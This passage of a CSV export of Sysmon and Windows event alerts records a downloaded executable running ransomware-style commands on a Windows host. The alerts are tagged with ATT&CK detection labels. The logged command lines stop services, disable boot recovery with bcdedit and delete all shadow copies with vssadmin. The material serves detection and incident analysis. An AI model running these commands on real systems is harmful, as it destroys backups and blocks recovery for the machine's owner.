sihost.exe\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:16.480"",""processGuid"":""{df9fc3d3-1aa0-5ec9-0000-0010ffa40d00}"",""processId"":""7660"",""image"":""C:\\\\Windows\\\\explorer.exe"",""fileVersion"":""10.0.18362.693 (WinBuild.160101.0800)"",""description"":""Windows Explorer"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""EXPLORER.EXE"",""commandLine"":""explorer.exe /LOADSAVEDWINDOWS"",""currentDirectory"":""C:\\\\Windows\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=F7DC8A74E30E08B9510380274CFB9288,SHA256=C5E88D778C0B118D49BEF467ED059C09B61DEEA505D2A3D5CA1DCC0A5CDF752F,IMPHASH=FE6F775DD0C72FFD106F56930C60A452"",""parentProcessGuid"":""{df9fc3d3-1a9b-5ec9-0000-0010c5100d00}"",""parentProcessId"":""7432"",""parentImage"":""C:\\\\Windows\\\\System32\\\\sihost.exe"",""parentCommandLine"":""sihost.exe""}}}" +"May 23, 2020 @ 12:44:34.248",9,"Windows Application error event","""Faulting application name: RuntimeBroker.exe, version: 10.0.18362.1, time stamp: 0x4539d5a0 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xe94 +Faulting application start time: 0x01d630ffccd5ad63 +Faulting application path: C:\Windows\System32\RuntimeBroker.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 14807a95-a99b-4365-b5f1-547eafcb6acb +Faulting package full name: Microsoft.YourPhone_1.20022.82.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: runtimebroker07f4358a809ac99a64a67c1""",, +"May 23, 2020 @ 12:44:28.051",9,"Windows Application error event","""Faulting application name: OneDrive.exe, version: 20.52.311.11, time stamp: 0x95f7bd77 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x832e7bce +Exception code: 0xc0000409 +Fault offset: 0x00088d30 +Faulting process id: 0x1694 +Faulting application start time: 0x01d630ffcd4bcc2a +Faulting application path: C:\Users\John Williams\AppData\Local\Microsoft\OneDrive\OneDrive.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 6ced96b8-7591-427f-be66-ba2988f2d41b +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:44:21.366",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:09.137 +ProcessGuid: {df9fc3d3-1a99-5ec9-0000-0010c0b70c00} +ProcessId: 7260 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1a97-5ec9-0000-0010aa7f0c00} +ParentProcessId: 6048 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y""","C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:09.157435500Z"",""eventRecordID"":""1634"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:09.137\r\nProcessGuid: {df9fc3d3-1a99-5ec9-0000-0010c0b70c00}\r\nProcessId: 7260\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1a97-5ec9-0000-0010aa7f0c00}\r\nParentProcessId: 6048\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:09.137"",""processGuid"":""{df9fc3d3-1a99-5ec9-0000-0010c0b70c00}"",""processId"":""7260"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1a97-5ec9-0000-0010aa7f0c00}"",""parentProcessId"":""6048"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y""}}}" +"May 23, 2020 @ 12:44:21.274",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:08.839 +ProcessGuid: {df9fc3d3-1a98-5ec9-0000-001079ae0c00} +ProcessId: 7224 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1a98-5ec9-0000-0010e4880c00} +ParentProcessId: 6236 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:08.883093600Z"",""eventRecordID"":""1630"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:08.839\r\nProcessGuid: {df9fc3d3-1a98-5ec9-0000-001079ae0c00}\r\nProcessId: 7224\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1a98-5ec9-0000-0010e4880c00}\r\nParentProcessId: 6236\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:08.839"",""processGuid"":""{df9fc3d3-1a98-5ec9-0000-001079ae0c00}"",""processId"":""7224"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1a98-5ec9-0000-0010e4880c00}"",""parentProcessId"":""6236"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:44:19.587",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:08.013 +ProcessGuid: {df9fc3d3-1a98-5ec9-0000-0010e4880c00} +ProcessId: 6236 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:08.020210300Z"",""eventRecordID"":""1626"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:08.013\r\nProcessGuid: {df9fc3d3-1a98-5ec9-0000-0010e4880c00}\r\nProcessId: 6236\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:08.013"",""processGuid"":""{df9fc3d3-1a98-5ec9-0000-0010e4880c00}"",""processId"":""6236"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:19.493",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:07.673 +ProcessGuid: {df9fc3d3-1a97-5ec9-0000-0010aa7f0c00} +ProcessId: 6048 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:07.834345700Z"",""eventRecordID"":""1623"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:07.673\r\nProcessGuid: {df9fc3d3-1a97-5ec9-0000-0010aa7f0c00}\r\nProcessId: 6048\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:07.673"",""processGuid"":""{df9fc3d3-1a97-5ec9-0000-0010aa7f0c00}"",""processId"":""6048"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:18.058",9,"Windows Application error event","""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. +] """,, +"May 23, 2020 @ 12:44:17.302",9,"Windows Application error event","""Faulting application name: StartMenuExperienceHost.exe, version: 0.0.0.0, time stamp: 0x5d65fb6a +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x11d8 +Faulting application start time: 0x01d630ffc3edb2c7 +Faulting application path: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: e22519a7-e804-4b68-a44a-3aaf0ab24d16 +Faulting package full name: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: App""",, +"May 23, 2020 @ 12:44:17.108",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:05.013 +ProcessGuid: {df9fc3d3-1a95-5ec9-0000-0010d3590c00} +ProcessId: 7040 +Image: C:\Windows\System32\bcdedit.exe +FileVersion: 10.0.18362.295 (WinBuild.160101.0800) +Description: Boot Configuration Data Editor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: bcdedit.exe +CommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default} +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","bcdedit /set {default} recoveryenabled No & bcdedit /set {default}","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:05.164693700Z"",""eventRecordID"":""1616"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:05.013\r\nProcessGuid: {df9fc3d3-1a95-5ec9-0000-0010d3590c00}\r\nProcessId: 7040\r\nImage: C:\\Windows\\System32\\bcdedit.exe\r\nFileVersion: 10.0.18362.295 (WinBuild.160101.0800)\r\nDescription: Boot Configuration Data Editor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: bcdedit.exe\r\nCommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:05.013"",""processGuid"":""{df9fc3d3-1a95-5ec9-0000-0010d3590c00}"",""processId"":""7040"",""image"":""C:\\\\Windows\\\\System32\\\\bcdedit.exe"",""fileVersion"":""10.0.18362.295 (WinBuild.160101.0800)"",""description"":""Boot Configuration Data Editor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""bcdedit.exe"",""commandLine"":""bcdedit /set {default} recoveryenabled No & bcdedit /set {default}"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:17.098",15,"ATT&CK T1070 T1490: Shadow Copies Deletion Using Operating Systems Utilities","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:04.964 +ProcessGuid: {df9fc3d3-1a94-5ec9-0000-001070590c00} +ProcessId: 7024 +Image: C:\Windows\System32\vssadmin.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Command Line Interface for Microsoft® Volume Shadow Copy Service +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: VSSADMIN.EXE +CommandLine: vssadmin.exe Delete Shadows /all /quiet +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","vssadmin.exe Delete Shadows /all /quiet","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:05.160426800Z"",""eventRecordID"":""1615"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:04.964\r\nProcessGuid: {df9fc3d3-1a94-5ec9-0000-001070590c00}\r\nProcessId: 7024\r\nImage: C:\\Windows\\System32\\vssadmin.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Command Line Interface for Microsoft® Volume Shadow Copy Service \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: VSSADMIN.EXE\r\nCommandLine: vssadmin.exe Delete Shadows /all /quiet\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:04.964"",""processGuid"":""{df9fc3d3-1a94-5ec9-0000-001070590c00}"",""processId"":""7024"",""image"":""C:\\\\Windows\\\\System32\\\\vssadmin.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Command Line Interface for Microsoft® Volume Shadow Copy 